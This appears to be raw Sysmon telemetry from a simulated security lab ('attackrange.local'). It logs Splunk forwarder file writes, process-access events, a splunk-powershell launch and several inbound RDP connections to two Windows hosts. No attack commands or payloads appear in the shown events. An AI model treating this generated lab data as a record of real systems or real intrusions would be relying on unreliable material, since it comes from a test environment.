Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B51F88E98B762A3105B45A2D5D3C211,SHA256=42038A3669FEC4CB9074C6E11B271A6CEBA8E62ABC3FE37B9EA835D5F9689D8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:21.318{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=816D358BB81C3E374B3784C7EBB08F8F,SHA256=A724186B445F7DA993E066846F485F5AADE9D407B9EF2B071CA36546C269C658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:21.819{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=459616A1D74BA5C786152087167E7BAF,SHA256=7E62259AE1AF05794E2CC6E1FB5997890BB52AC607899CC6876BB93A21066096,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:21.619{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001057879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:20.590{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.78-63084-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:22.913{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACC7A1C658B3E8D24E79CEA503F9B517,SHA256=C1CC466DB0B70D498010392F8271D9FB19B6295B130E1A5C31DC2BA1DD03A7FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:18.003{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63421-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:22.396{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BB0EE71FAC317A36F68D99A620BE26C,SHA256=094B0AB70A4ACA7D897518D9969F24787E165A96E496F22223776D1027F053E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:23.993{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8BF3DB3964251A44D82EAD68FCCD0A4,SHA256=671CC4BD9AC4DBAD6AD45300714C01B08DCB755869437D6051D8F3670EB3E03A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:23.569{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FDDA545C3721A2CB15BD4DE8BB42F22,SHA256=B4BED29C722CBD567873A576346CEBA6BFCEB927C7DFB3F90BF386179F616A38,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:22.252{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de56545-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:24.993{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5675ED064926BDF9E3DC9B6A5480DF,SHA256=1097C00924365176C5083DB085897CAD52354FEC2BD46E8CD8109DBB5412914A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:24.788{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBC1E99553E504FEFCA49C5A18A0FC38,SHA256=2B5F0F6EDEA41DD06ADC934ED2D4CFA4C20CFF0CD333793C4EEAB265BDE69D0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:24.725{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=673149C950CC3BB846E602B10E01A5FA,SHA256=C0A5CD2957B545E091EE54E1CF9A6D845A160295BA42A99F64FA3524B4B9D35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:24.540{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27AA9615E6E4A3DED99953A9AB69B268,SHA256=F9C77479FC0011A9118C1C92AB68DF08C96351E4C81D9A237D6CB175EF47BE04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:20.859{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59594-false10.0.1.12-8000- 23542300x8000000000000000982191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.960{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15FDC5CC4625C28BC84B6D8170F6EA21,SHA256=3ECE426352D1931AB0720C361B13570004DD8A9746E74EA275275842698054F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.866{69CF5F33-8EB9-6151-377A-00000000FD01}1843852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EB9-6151-377A-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8EB9-6151-377A-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.663{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EB9-6151-377A-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.648{69CF5F33-8EB9-6151-377A-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000982176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:22.346{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de61898-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:26.915{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D414AA9DB6DEEB049F266A660E79E282,SHA256=96CF06344BB9D6916E6B612BFE18ACF1675C479043057BFDB23AE12A10E7052F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:26.056{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA4998290B06C7F6F3312D97DDD8709F,SHA256=481AA52C43B2CE157F75680E7E6FBAA292DEEE678BDE05521F2B20B0560BC9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.694{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3822C32330EC3FD0C77CC384DE0AC7CA,SHA256=61BE99FA59B3AA916989BFECCE1A0B2E9EE34C549F941FE173E3F3FB45D23FF4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:22.634{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51183-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000982205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.538{69CF5F33-8EBA-6151-387A-00000000FD01}1128936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EBA-6151-387A-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 